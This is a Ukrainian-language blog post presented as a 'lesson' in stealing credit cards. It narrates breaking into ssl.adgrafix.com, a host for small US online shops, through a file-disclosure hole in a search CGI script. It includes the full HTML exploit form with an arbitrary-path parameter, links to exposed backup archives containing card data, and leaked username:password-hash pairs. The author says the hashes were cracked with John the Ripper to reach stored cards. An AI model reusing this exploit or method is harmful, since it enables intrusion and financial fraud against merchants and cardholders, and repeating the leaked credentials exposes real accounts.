|
Продовжуємо цикл наших уроків по отриманню кредитних карт.
Ресурс ssl.adgrafix.com є сховищем сотні невеликих американських інтернет-магазинів.
Пройти мимо такого факту було не можна.
Тим більше, що я виявив на цьому сервері бажний пошуковий скрипт, який дозволяє переглядати будь-який файл на сервері з правами сервера.
Про уразливості докладніше дивитись тут: http://www.lwb57.org/advisories/?adv=12
Але моя задача полягала в більшому, отримати доступ до юзерскій храніліцам кредитних карт.
Нацькувавши на сервер DCS з самопісний базою, я через деякий час побачив, що директорія / users / відкрита для перегляду, в ній лежали папки користувачів, природно вимагають авторизації.
Але крім цього, тут же лежало кілька бекап-архівів юзеркіх папок, які опинилися доступними для скачування:
http://ssl.adgrafix.com/users/cedarsinn-secure.tar
http://ssl.adgrafix.com/users/diamonds-secure.tar
http://ssl.adgrafix.com/users/heavymetal-secure.tar
і т.д.
У їхньому вмісті виявилися кредитки, але найбільшою знахідкою був файл .htaccess такого змісту:
AuthUserFile / opt / home2 / adgrafix / securedir / heavymetalpw
AuthGroupFile / dev / null
AuthName "Secure Data Retrieval System"
AuthType Basic
<Limit GET POST>
require user heavymetal
</ Limit>
Увага відразу привернув файл з паролем heavymetalpw, і найголовніше тут був прописаний шлях до нього.
Залишалося в exploit додати цей шлях і я отримав пароль користувача:
<form method = POST action = "http://ssl.adgrafix.com/cgi-bin/wsmsearch2.cgi">
<B> <FONT FACE = "Arial, Helvetica"> <FONT SIZE = -1> Search Site: </ FONT> </ FONT> <br> </ B>
<input type = text name = "terms" size = 20>
<input type = hidden name = boolean value = "AND">
<input type = hidden name = case value = "Insensitive">
<input type = hidden name = quicksearch value = "NO">
<input type = hidden name = max value = "50">
<input type = hidden name = faqfile value = "/">
<input type = hidden name = resultspage value = "/ opt / home2 / adgrafix / securedir / heavymetalpw">
<input type = submit value = "Search!">
You are calling this script from a domain that is not registered with Adgrafix
Content-type: text / html heavymetal: .vGqzyBep5EDE bcroman: 1b8HaV7PCqZc.
Крім цього у мене вже був список користувачів цього ресурсу, отриманий за допомогою того ж скрипта,
в який досить було ввести просто ім'я будь-якого існуючого користувача:
http://ssl.adgrafix.com/ssl_adgrafix_user_list.txt
Звичайно можна було б брати логіни користувачів з папки / users /, але раз пошуковик був дуже добрий і видав мені відразу список логінів, я вирішив не напружуватися.
Години через два я вже зібрав всі логіни / паролі і згодував його john'у, і через три дні у мене вже був доступ до половині юзеркіх сховищ кред.
Твій bug Durito.
_________________
EAT THE RICH!
| 
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.